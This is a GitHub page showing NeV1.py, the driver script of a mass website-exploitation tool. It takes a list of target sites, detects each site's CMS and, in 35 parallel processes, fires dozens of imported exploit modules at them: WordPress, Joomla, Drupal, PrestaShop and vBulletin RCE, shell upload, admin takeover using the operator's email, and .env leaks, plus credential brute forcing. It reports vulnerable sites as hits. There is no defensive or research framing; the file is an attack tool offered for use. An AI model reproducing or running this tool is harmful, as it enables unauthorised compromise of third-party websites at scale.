This repository has been archived by the owner on May 4, 2021. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 120
/
Copy pathNeV1.py
503 lines (485 loc) · 17.8 KB
/
NeV1.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
YOUR_Email_For_TAkeAdmin_Exploit = '[email protected]' # Edit your email
r = '\033[31m'
g = '\033[32m'
y = '\033[33m'
b = '\033[34m'
m = '\033[35m'
c = '\033[36m'
w = '\033[37m'
# --------------------------------
VERSION = 'V1 Revolution'
# ----------------------------------------
from Tools import cms
import sys, os, threading, time, re
from multiprocessing import Pool
try:
from bs4 import BeautifulSoup
except ImportError:
print('---------------------------------------------------')
print('[*] pip install bs4')
print(' [-] you need to install bs4 Module')
sys.exit()
try:
import requests
except ImportError:
print('---------------------------------------------------')
print('[*] pip install requests')
print(' [-] you need to install requests Module')
sys.exit()
try:
os.mkdir('result')
except:
pass
try:
os.mkdir('cms')
except:
pass
# ------------PrestaShop-----------
from Exploits import Presta_1attributewizardpro
from Exploits import Presta_advancedslider
from Exploits import Presta_attributewizardpro
from Exploits import Presta_attributewizardpro3
from Exploits import Presta_attributewizardpro_x
from Exploits import Presta_cartabandonmentpro
from Exploits import Presta_columnadverts
from Exploits import Presta_fieldvmegamenu
from Exploits import Presta_homepageadvertise
from Exploits import Presta_homepageadvertise2
from Exploits import Presta_jro_homepageadvertise
from Exploits import Presta_lib
from Exploits import Presta_megamenu
from Exploits import Presta_nvn_export_orders
from Exploits import Presta_pk_flexmenu
from Exploits import Presta_productpageadverts
from Exploits import Presta_psmodthemeoptionpanel
from Exploits import Presta_simpleslideshow
from Exploits import Presta_soopabanners
from Exploits import Presta_soopamobile
from Exploits import Presta_tdpsthemeoptionpanel
from Exploits import Presta_videostab
from Exploits import Presta_vtermslideshow
from Exploits import Presta_wdoptionpanel
from Exploits import Presta_wg24themeadministration
from Exploits import cartabandonmentproOld
# ------------Wordpress-------------
from Exploits import cherry_plugin
from Exploits import CVE_2008_3362Download_Manager
from Exploits import CVE_2014_4725wysija
from Exploits import CVE_2014_9735_revsliderShell
from Exploits import CVE_2015_1579_revsliderConfig
from Exploits import CVE_2015_4455_gravityforms
from Exploits import CVE_2015_4455_gravityformsindex
from Exploits import CVE_2015_5151_revsliderCSS
from Exploits import CVE_2017_16562userpro
from Exploits import CVE_2018_19207wp_gdpr_compliance
from Exploits import CVE_2019_9879wp_graphql
from Exploits import formcraft
from Exploits import Headway
from Exploits import pagelinesExploit
from Exploits import WooCommerce_ProductAddonsExp
from Exploits import WpCateGory_page_icons
from Exploits import Wp_addblockblocker
from Exploits import wp_barclaycart
from Exploits import wp_content_injection
from Exploits import wp_eshop_magic
from Exploits import Wp_HD_WebPlayer
from Exploits import Wp_Job_Manager
from Exploits import wp_miniaudioplayer
from Exploits import Wp_pagelines
from Exploits import wp_support_plus_responsive_ticket_system
from Exploits import wp_ungallery
from Exploits import WP_User_Frontend
from Exploits import viral_optinsExploit
from Exploits import CVE_2019_9978SocialWarfare
from Exploits import WPJekyll_Exporter
from Exploits import Wp_cloudflare
from Exploits import Wprealia
from Exploits import Wpwoocommercesoftware
from Exploits import Wp_enfold_child
from Exploits import Wp_contabileads
from Exploits import Wp_prh_api
from Exploits import Wp_dzs_videogallery
from Exploits import Wp_mmplugin
from Exploits import wpinstall
from BruteForce import Wordpress
from BruteForce import FTPBruteForce
# -------------Joomla---------------
from Exploits import Com_adsmanager
from Exploits import Com_alberghi
from Exploits import Com_CCkJseblod
from Exploits import Com_extplorer
from Exploits import Com_Fabric
from Exploits import Com_FoxContent
from Exploits import Com_b2jcontact
from Exploits import Com_bt_portfolio
from Exploits import Com_civicrm
from Exploits import Com_jwallpapers
from Exploits import Com_oziogallery
from Exploits import Com_redmystic
from Exploits import Com_simplephotogallery
from Exploits import megamenu
from Exploits import mod_simplefileuploadv1
from Exploits import Com_facileforms
from Exploits import Com_Hdflvplayer
from Exploits import Com_Jbcatalog
from Exploits import Com_JCE
from Exploits import com_jdownloads
from Exploits import Com_JCEindex
from Exploits import Com_Joomanager
from Exploits import Com_Macgallery
from Exploits import com_media
from Exploits import Com_Myblog
from Exploits import Com_rokdownloads
from Exploits import Com_s5_media_player
from Exploits import Com_SexyContactform
from Exploits import CVE_2015_8562RCEjoomla
from Exploits import CVE_2015_8562RCEjoomla2019
from Exploits import CVE_2016_9838TakeAdminJoomla
from BruteForce import Joomla
# --------------Drupal---------------
from Exploits import CVE_2014_3704Drupal_add_Admin
from Exploits import CVE_2018_7600Drupalgeddon2
from Exploits import CVE_2019_6340Drupal8RESTful
from Exploits import Drupal_mailchimp
from Exploits import phpcurlclass
from BruteForce import Drupal
# --------------Oscommerce-----------
from Exploits import osCommerce
# -------------opencart--------------
from BruteForce import Opencart
# --------------vBulletin-----------
from Exploits import CVE_2019_16759vBulletinRCE
# --------------Unknown--------------
from Exploits import CVE_2006_2529fckeditor
from Exploits import phpunit
from Exploits import env
from Tools import Sqli
def clear():
linux = 'clear'
windows = 'cls'
os.system([linux, windows][os.name == 'nt'])
def Banner():
bb = open('files/banner.txt', 'r').read()
print(bb.format(r, g, r, w, r, y, w))
def options():
option = '''
'''.format(r, w, c, g, c, g, c, w)
print(option)
# --------------------------------------- Multi Scan -----------------------------------------------
def Rez(site, i):
try:
if 'YES' in str(i):
print(' {}[+] {}{} {}--> {}{} {}Vuln!!{}'.format(g, w, site, c, y, i[2], g, w))
else:
print(' {}[-] {}{} {}--> {}{} {}Not!!{}'.format(r, w, site, c, y, i[2], r, w))
except:
print(' {}[-] {}{} {}--> {}{} {}Not!!{}'.format(r, w, site, c, y, i[2], r, w))
def MultiThreadScan(site):
try:
if site.startswith('http://'):
site = site.replace('http://', '')
elif site.startswith("https://"):
site = site.replace('https://', '')
else:
pass
Check_CMs = cms.DetectCMS(site)
if Check_CMs == 'wordpress':
i = CVE_2019_9978SocialWarfare.Exploit(site)
Rez(site, i)
i = cherry_plugin.Exploit(site)
Rez(site, i)
i = CVE_2008_3362Download_Manager.Exploit(site)
Rez(site, i)
i = CVE_2014_4725wysija.Exploit(site)
Rez(site, i)
i = CVE_2014_9735_revsliderShell.Exploit(site)
Rez(site, i)
i = CVE_2015_1579_revsliderConfig.Exploit(site)
Rez(site, i)
i = CVE_2015_4455_gravityformsindex.Exploit(site)
Rez(site, i)
i = CVE_2015_4455_gravityforms.Exploit(site)
Rez(site, i)
i = CVE_2015_5151_revsliderCSS.Exploit(site)
Rez(site, i)
i = CVE_2017_16562userpro.Exploit(site)
Rez(site, i)
i = CVE_2018_19207wp_gdpr_compliance.Exploit(site, YOUR_Email_For_TAkeAdmin_Exploit)
Rez(site, i)
i = CVE_2019_9879wp_graphql.Exploit(site, YOUR_Email_For_TAkeAdmin_Exploit)
Rez(site, i)
i = formcraft.Exploit(site)
Rez(site, i)
i = Wp_contabileads.Exploit(site)
Rez(site, i)
i = Wp_prh_api.Exploit(site)
Rez(site, i)
i = Wp_mmplugin.Exploit(site)
Rez(site, i)
i = Wp_dzs_videogallery.Exploit(site)
Rez(site, i)
i = Headway.Exploit(site)
Rez(site, i)
i = pagelinesExploit.Exploit(site)
Rez(site, i)
i = WooCommerce_ProductAddonsExp.Exploit(site)
Rez(site, i)
i = WpCateGory_page_icons.Exploit(site)
Rez(site, i)
i = Wp_addblockblocker.Exploit(site)
Rez(site, i)
i = wp_barclaycart.Exploit(site)
Rez(site, i)
i = wp_content_injection.Exploit(site)
Rez(site, i)
i = wp_eshop_magic.Exploit(site)
Rez(site, i)
i = WPJekyll_Exporter.Exploit(site)
Rez(site, i)
i = Wp_cloudflare.Exploit(site)
Rez(site, i)
i = Wprealia.Exploit(site)
Rez(site, i)
i = Wpwoocommercesoftware.Exploit(site)
Rez(site, i)
i = Wp_enfold_child.Exploit(site)
Rez(site, i)
i = Wp_HD_WebPlayer.Exploit(site)
Rez(site, i)
i = Wp_Job_Manager.Exploit(site)
Rez(site, i)
i = wp_miniaudioplayer.Exploit(site)
Rez(site, i)
i = Wp_pagelines.Exploit(site)
Rez(site, i)
i = wp_support_plus_responsive_ticket_system.Exploit(site)
Rez(site, i)
i = wp_ungallery.Exploit(site)
Rez(site, i)
i = WP_User_Frontend.Exploit(site)
Rez(site, i)
i = viral_optinsExploit.Exploit(site)
Rez(site, i)
i = wpinstall.Exploit(site)
Rez(site, i)
i = CVE_2006_2529fckeditor.Exploit(site, 'Wordpress')
Rez(site, i)
i = phpunit.Exploit(site, 'Wordpress')
Rez(site, i)
mkobj = Wordpress.Wordpress()
i = mkobj.Run(site)
Rez(site, i)
i = env.Exploit(site)
Rez(site, i)
FTPBruteForce.Exploit(site)
elif Check_CMs == 'joomla':
i = CVE_2015_8562RCEjoomla.Exploit(site)
Rez(site, i)
i = CVE_2015_8562RCEjoomla2019.exploit(site)
Rez(site, i)
i = CVE_2016_9838TakeAdminJoomla.Exploit(site, YOUR_Email_For_TAkeAdmin_Exploit)
Rez(site, i)
i = com_jdownloads.Exploit(site)
Rez(site, i)
i = Com_FoxContent.Exploit(site)
Rez(site, i)
i = Com_b2jcontact.Exploit(site)
Rez(site, i)
i = Com_bt_portfolio.Exploit(site)
Rez(site, i)
i = Com_civicrm.Exploit(site)
Rez(site, i)
i = Com_jwallpapers.Exploit(site)
Rez(site, i)
i = Com_oziogallery.Exploit(site)
Rez(site, i)
i = Com_redmystic.Exploit(site)
Rez(site, i)
i = Com_simplephotogallery.Exploit(site)
Rez(site, i)
i = megamenu.Exploit(site)
Rez(site, i)
i = mod_simplefileuploadv1.Exploit(site)
Rez(site, i)
i = Com_JCE.Exploit(site)
Rez(site, i)
i = Com_JCEindex.Exploit(site)
Rez(site, i)
i = com_media.Exploit(site)
Rez(site, i)
i = Com_Myblog.Exploit(site)
Rez(site, i)
i = Com_adsmanager.Exploit(site)
Rez(site, i)
i = Com_alberghi.Exploit(site)
Rez(site, i)
i = Com_CCkJseblod.Exploit(site)
Rez(site, i)
i = Com_extplorer.Exploit(site)
Rez(site, i)
i = Com_Fabric.Exploit(site)
Rez(site, i)
i = Com_facileforms.Exploit(site)
Rez(site, i)
i = Com_Hdflvplayer.Exploit(site)
Rez(site, i)
i = Com_Jbcatalog.Exploit(site)
Rez(site, i)
i = Com_Joomanager.Exploit(site)
Rez(site, i)
i = Com_Macgallery.Exploit(site)
Rez(site, i)
i = Com_rokdownloads.Exploit(site)
Rez(site, i)
i = Com_s5_media_player.Exploit(site)
Rez(site, i)
i = Com_SexyContactform.Exploit(site)
Rez(site, i)
i = CVE_2006_2529fckeditor.Exploit(site, 'Joomla')
Rez(site, i)
i = phpunit.Exploit(site, 'Joomla')
Rez(site, i)
mkobj = Joomla.JooMLaBruteForce()
i = mkobj.Run(site)
Rez(site, i)
i = env.Exploit(site)
Rez(site, i)
elif Check_CMs == 'drupal':
i = CVE_2014_3704Drupal_add_Admin.Exploit(site)
Rez(site, i)
i = CVE_2018_7600Drupalgeddon2.Exploit(site)
Rez(site, i)
i = Drupal_mailchimp.Exploit(site)
Rez(site, i)
i = phpcurlclass.Exploit(site)
Rez(site, i)
i = CVE_2019_6340Drupal8RESTful.Exploit(site)
Rez(site, i)
i = CVE_2006_2529fckeditor.Exploit(site, 'Drupal')
Rez(site, i)
i = phpunit.Exploit(site, 'Drupal')
Rez(site, i)
mkobj = Drupal.DrupalBruteForce()
i = mkobj.Run(site)
Rez(site, i)
i = env.Exploit(site)
Rez(site, i)
elif Check_CMs == 'opencart':
mkobj = Opencart.OpenCart()
i = phpunit.Exploit(site, 'OpenCart')
Rez(site, i)
i = CVE_2006_2529fckeditor.Exploit(site, 'OpenCart')
Rez(site, i)
i = mkobj.Run(site)
Rez(site, i)
i = env.Exploit(site)
Rez(site, i)
elif Check_CMs == 'oscommerce':
i = phpunit.Exploit(site, 'osCommerce')
Rez(site, i)
i = osCommerce.Exploit(site)
Rez(site, i)
i = CVE_2006_2529fckeditor.Exploit(site, 'osCommerce')
Rez(site, i)
i = env.Exploit(site)
Rez(site, i)
elif Check_CMs == 'vBulletin':
i = phpunit.Exploit(site, 'vBulletin')
Rez(site, i)
i = CVE_2019_16759vBulletinRCE.Exploit(site)
Rez(site, i)
i = CVE_2006_2529fckeditor.Exploit(site, 'vBulletin')
Rez(site, i)
i = env.Exploit(site)
Rez(site, i)
elif Check_CMs == 'prestashop':
i = Presta_1attributewizardpro.Exploit(site)
Rez(site, i)
i = Presta_advancedslider.Exploit(site)
Rez(site, i)
i = Presta_attributewizardpro.Exploit(site)
Rez(site, i)
i = Presta_attributewizardpro3.Exploit(site)
Rez(site, i)
i = Presta_attributewizardpro_x.Exploit(site)
Rez(site, i)
i = Presta_cartabandonmentpro.Exploit(site)
Rez(site, i)
i = Presta_columnadverts.Exploit(site)
Rez(site, i)
i = Presta_fieldvmegamenu.Exploit(site)
Rez(site, i)
i = Presta_homepageadvertise.Exploit(site)
Rez(site, i)
i = Presta_homepageadvertise2.Exploit(site)
Rez(site, i)
i = Presta_jro_homepageadvertise.Exploit(site)
Rez(site, i)
i = Presta_lib.Exploit(site)
Rez(site, i)
i = Presta_megamenu.Exploit(site)
Rez(site, i)
i = Presta_nvn_export_orders.Exploit(site)
Rez(site, i)
i = Presta_pk_flexmenu.Exploit(site)
Rez(site, i)
i = Presta_productpageadverts.Exploit(site)
Rez(site, i)
i = Presta_psmodthemeoptionpanel.Exploit(site)
Rez(site, i)
i = Presta_simpleslideshow.Exploit(site)
Rez(site, i)
i = Presta_soopabanners.Exploit(site)
Rez(site, i)
i = Presta_soopamobile.Exploit(site)
Rez(site, i)
i = Presta_tdpsthemeoptionpanel.Exploit(site)
Rez(site, i)
i = Presta_videostab.Exploit(site)
Rez(site, i)
i = Presta_vtermslideshow.Exploit(site)
Rez(site, i)
i = Presta_wdoptionpanel.Exploit(site)
Rez(site, i)
i = Presta_wg24themeadministration.Exploit(site)
Rez(site, i)
i = cartabandonmentproOld.Exploit(site)
Rez(site, i)
i = env.Exploit(site)
Rez(site, i)
elif Check_CMs == 'unknown':
i = phpunit.Exploit(site, 'unknown')
Rez(site, i)
i = CVE_2006_2529fckeditor.Exploit(site, 'unknown')
Rez(site, i)
i = env.Exploit(site)
Rez(site, i)
i = Sqli.Exploit(site)
Rez(site, i)
elif Check_CMs == 'deadTarget':
print(' {}[-] {}{} {}--> {} Timeout!!{}'.format(r, w, site, c, y, w))
except:
print(' {}[-] {}{} {}--> {} Crashed!!{}'.format(r, w, site, c, y, w))
fuck = "Your Brain Error"
yap = "Please Wait A Second..."
if __name__ == '__main__':
clear()
try:
Target = sys.argv[1]
try:
print(yap)
x = open(Target, 'r').read().splitlines()
TEXTList = open(Target, 'r').read().splitlines()
p = Pool(35)
p.map(MultiThreadScan, TEXTList)
except:
try:
clear()
print(fuck)
except:
Target = sys.argv[1]
except:
clear()
Banner()
options()
sys.exit()